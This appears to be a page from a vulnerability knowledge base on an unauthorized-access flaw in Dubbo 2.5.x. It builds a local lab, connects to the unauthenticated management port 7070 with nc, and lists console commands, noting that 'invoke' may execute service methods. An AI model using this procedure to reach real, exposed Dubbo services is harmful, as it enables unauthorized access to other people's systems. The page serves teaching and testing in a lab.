Dubbo Unauthorized Access Vulnerability

Introduction to the vulnerability

Dubbo is an open source, high-performance service framework developed by Alibaba Inc. that enables applications to perform input and output functions via high-performance RPC, and can seamlessly integrate with the Spring framework. Dubbo has an unauthorized access vulnerability due to improper configuration.

Environment setup

git clone https://github.com/alibaba/dubbo/tree/2.5.x

Enter the dubbo-2.5.x directory

Execute mvn clean package -Dmaven.test.skip=true, and the following results will be generated:

image-20220726153013824

In the dubbo-2.5.x/dubbo-simple/dubbo-monitor-simple/target directory, you will find dubbo-monitor-simple-2.5.10-assembly.tar.gz generated, extract this folder.

Check the configuration file, and you will see that the dubbo protocol port is 7070.

[root@localhost dubbo-monitor-simple-2.5.10]# cat conf/dubbo.properties 

dubbo.container=log4j,spring,registry,jetty
dubbo.application.name=simple-monitor
dubbo.application.owner=
dubbo.registry.address=multicast://224.5.6.7:1234
#dubbo.registry.address=zookeeper://127.0.0.1:2181
#dubbo.registry.address=redis://127.0.0.1:6379
#dubbo.registry.address=dubbo://127.0.0.1:9090
dubbo.protocol.port=7070
dubbo.jetty.port=8080
dubbo.jetty.directory=${user.home}/monitor
dubbo.charts.directory=${dubbo.jetty.directory}/charts
dubbo.statistics.directory=${user.home}/monitor/statistics
dubbo.log4j.file=logs/dubbo-monitor-simple.log

Start Dubbo

[root@localhost dubbo-monitor-simple-2.5.10]# bin/start.sh

Vulnerability exploitation

Connect to port 7070 with nc, port 7070 allows you to perform various management tasks, such as checking the status of the registry, listing available services, and viewing the log level of the registry.

[root@localhost dubbo-monitor-simple-2.5.10]# nc 127.0.0.1 7070
ls
com.alibaba.dubbo.monitor.MonitorService
dubbo>help
Please input "help [command]" show detail.
 status [-l]                      - Show status.
 pwd                              - Print working default service.
 trace [service] [method] [times] - Trace the service.
 exit                             - Exit the telnet.
 help [command]                   - Show help.
 invoke [service.]method(args)    - Invoke the service method.
 count [service] [method] [times] - Count the service.
 clear [lines]                    - Clear screen.
 ls [-l] [service]                - List services and methods.
 log level                        - Change log level or show log 
 ps [-l] [port]                   - Print server ports and connections.
 cd [service]                     - Change default service.
dubbo>status
OK
dubbo>pwd
/

If the service has command execution capability, the "invoke" command may execute commands as the "invoke" command is used to invoke specific service methods.

PreviousDocker Unauthorized Access VulnerabilityNextJenkins Unauthorized Access Vulnerability

Last updated